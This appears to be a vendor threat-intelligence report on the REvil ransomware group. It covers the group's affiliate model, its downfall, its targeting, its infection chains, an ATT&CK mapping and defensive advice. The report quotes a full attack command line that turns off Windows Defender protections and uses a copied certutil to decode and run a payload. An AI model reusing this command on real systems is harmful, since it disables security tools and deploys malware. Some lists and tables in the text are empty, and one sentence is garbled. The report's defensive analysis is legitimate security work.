- Noticias de seguridad
- Ransomware Spotlight
- Ransomware Spotlight: REvil
The connection between Water Mare and REvil dates back to April 2019, its first confirmed deployment. In June 2019, it was advertised by an actor with the username UNKN or Unknown (the same as REvil’s) on the XSS forum. It operated as an affiliate service: Affiliates spread the ransomware to victims while REvil operators maintained the malware and payment infrastructure.
In 2020, Water Mare acquired new capabilities and accesses that would be used in future attacks thanks to its affiliates. These capabilities include the PE injection capability using a PowerShell and the credential stealer KPOT stealer, which UNKN won in an auction for its source code. Affiliates also offered access to company networks and a VPN server. Around this time UNKN also made efforts to limit affiliates to Russian-speaking members to prevent intrusion.
2021 was a series of highs and lows for Water Mare, culminating in the arrest of several affiliates and the close documentation of REvil’s downfall. The early part of the year promised new developments such as the aforementioned plans for distributed denial-of-service (DDoS) attacks, which would have ushered in triple extortion tactics. However, REvil’s biggest attacks — those that hit JBS and Kaseya — pushed law enforcement agencies to close in on the group’s heels.
FBI later attributed the Kaseya and JBS attacks to the Water Mare intrusion set. They reportedly gained access to the Water Mare intrusion set’s servers and retrieved the master key for REvil, which was provided to Kaseya. Around the same time, distrust for the threat group began to take root, with an affiliate claiming to have been bypassed in the negotiation process using a backdoor, foreshadowing REvil’s unraveling.
Despite announcing its return in September, by October 2021 Water Mare’s data leak program became inaccessible and the affiliate program terminated. Suspected Water Mare affiliates were also being arrested or tracked down, thanks to the efforts of global law enforcement agencies.
Ultimately, REvil’s activities placed it at the top of the list of ransomware operators that governments were eager to crack down on. In a global effort, law enforcement went after REvil operators both offline and online, leading to the shutdown of its operations and actual arrests.
Based on our findings from Water Mare, it is unlikely that the intrusion set will resurface under the name REvil because of the amount of negative publicity this moniker had received given the following points:
We surmise that the group can persist by rebranding, which is a common tactic among ransomware operators and which has been done by the group before. Case in point, DarkSide has renamed itself as BlackMatter. Meanwhile, REVil’s affiliates are likely to move to other ransomware operators, if they have not done so already. As for its operators, it is probable that they will continue to work or move to other ransomware operations, bringing their techniques with them. Therefore, for organizations wondering what’s next, there is still great value in understanding REvil tactics, techniques, and procedures (TTPs).
One aspect that made REvil’s operation infamous was its heavy extortion tactics. As mentioned earlier, operators behind the ransomware group considered DDoS and got in touch directly with customers, business partners, and the media to pressure victims into paying the ransom. They also auctioned stolen data to place more duress on their victims.
REvil is also known for being an example of highly targeted ransomware, as it utilized tools based on its operators’ high-level knowledge of their targeted entities. This resulted in a varied arsenal and customized infection chains, as we elaborate on later.
To this end, REvil used tools like FileZilla to exfiltrate data and PsExec to propagate and remotely execute the ransomware and other files. It also used other tools and malware such as PC Hunter, AdFind, BloodHound, NBTScan, SharpSploit, third-party file sync tools, and Qakbot, a trojan used to deliver ransomware.
As our detections show, REvil attacks were concentrated largely in the US, followed by Mexico and Germany by a wide margin. This is consistent with evidence found in the code of REvil that purposely excludes countries in the Commonwealth of Independent States (CIS) as its targets.
Figure 1. Countries with the highest number of attack attempts for the REvil ransomware (January 1 to December 6, 2021)
Source: Trend Micro™ Smart Protection Network™ infrastructure
We saw the most REvil-related detections in the transportation industry, followed by the financial sector. In our report summarizing ransomware activity in the first half of 2021, transportation was already among the top three most targeted sectors, likely for its role in the supply chain and logistics. In general, the top targeted sectors are all critical industries, further emphasizing how REvil had been operating especially in 2021.
Figure 2. Industries with the highest number of attack attempts for the REvil ransomware (January 1 to December 6, 2021)
Source: Trend Micro Smart Protection Network infrastructure
Due to its targeted nature, REvil used a variety of tools and malware depending what the situation dictated. Its operators appeared to operate on a high-level of knowledge on their victim’s environment, as evidenced by the level of customization in its attacks.
Figure 3. The general infection chain of REvil
Figure 4. A more targeted attack flow (top) and a simple attack flow (bottom)
Figure 5. Infection chain followed in the attack on Quanta Computer
Figure 6. Infection chain followed in the attack on Kaseya
Figure 7. An infection chain based on a more recent campaign
The threat actors behind REvil hired a variety of affiliates for their initial access. These ranged from those with malspam emails with spear-phishing links or attachments, RDP access and use of valid accounts, compromised websites, and exploits. These tactics then led to the download and execution of the payload using normal binaries like CertUtil, PowerShell, or via macro. Threat actors could also take on a more targeted approach by using RDP and PsExec to take control of the network and then deploy the payload. Another recently observed initial access is also possible via supply chain compromise, which could lead to the installation of Sodinstall or Sodinokibi, as observed in the Kaseya incident.
Here are some of the common ways the payload was downloaded and executed, based on what was observed and reported previously:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\\agent.crt c:\\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\\agent.exe”
REvil would send a report and system info to its C&C, which was done by generating a pseudorandom URL based on a fixed format and generation to add to a list of domains in its configuration. The URLs followed this format:
https://{Domain}/{String 1}/{String 2}/{random characters}.{String 3}
The domain and the strings here meant the following:
The impact and encryption process itself did not much since its inception.
Examples of these routines included processes to terminate, C&C to report to, and extension to use, among others.
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Discovery | Credential Access | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|
T1566 - Phishing T1190 - Exploit public-facing application T1189 - Drive-by compromise T1195 - Supply chain compromise T1078 - Valid accounts | T1106 - Execution through API T1059 - Command and scripting interpreter T1129 - Shared modules T1204 - User execution | T1547 - Boot or logon autostart execution Creates registry run entries for restarting in safe mode T1574 - Hijack execution flow | T1134 - Access token manipulation Uses ImpersonateLoggedOnUser API to impersonate the security context of the user who is logged in T1068 - Exploitation for privilege escalation T1574 - Hijack execution flow | T1027 - Obfuscated files or information T1562 - Impair defenses T1574 - Hijack execution flow | T1083 - File and directory discovery T1018 - Remote system discovery T1057 - Process discovery T1082 - System information discovery T1012 - Query registry T1063 - Security software discovery | T1003 - OS credential dumping T1552 - Unsecured credentials | T1570 - Lateral tool transfer | T1560 - Archive collected data T1005 - Data from local system | T1071 - Application Layer Protocol | T1567 - Exfiltration over web service T1048 - Exfiltration over alternative protocol | T1486 - Data encrypted for impact T1489 - Service stop T1490 - Inhibit system recovery T1529 - System shutdown/reboot T1491 - Defacement |
Security teams can watch out for the presence of the following malware tools and exploits that are typically used in REvil attacks:
Initial Entry | Execution | Discovery | Privilege Escalation | Credential Access | Lateral Movement | Defense Evasion | Exfiltration |
---|---|---|---|---|---|---|---|
|
|
|
|
|
|
|
|
While REvil operations have been shut down, it is likely that organizations, government bodies, and perhaps even ordinary consumers will not easily forget the consequences of its attack. Affiliates that have been involved in the attack could take up other ransomware operators, while REvil TTPs can be mimicked in newer campaigns. In the meantime, during the current shutdown, it is a good opportunity to learn from REvil as the group lies low.
To help defend systems against similar threats, organizations can establish security frameworks that can allocate resources systematically for establishing a solid defense against ransomware.
Here are some best practices that can be included in these frameworks:
A multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and network). Security solutions can detect malicious components and suspicious behavior could help protect enterprises.
The IOCs for this article can be found here.
Actual indicators might vary per attack.
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.